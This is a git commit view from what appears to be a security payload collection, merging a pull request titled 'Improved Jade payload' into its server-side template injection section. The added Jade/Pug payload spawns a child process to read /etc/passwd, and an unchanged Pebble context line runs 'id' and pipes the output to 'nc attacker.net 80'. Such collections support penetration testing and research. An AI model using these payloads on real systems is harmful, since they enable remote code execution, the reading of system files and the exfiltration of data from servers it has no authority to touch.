Merge pull request #284 from akoul02/patch-1

Improved Jade payload
This commit is contained in:
Swissky 2020-10-31 16:47:10 +01:00 committed by GitHub
commit 7f36bf58a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -291,6 +291,10 @@ New version of Pebble :
= x.exec('id | nc attacker.net 80') = x.exec('id | nc attacker.net 80')
``` ```
```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
## Velocity ## Velocity
```python ```python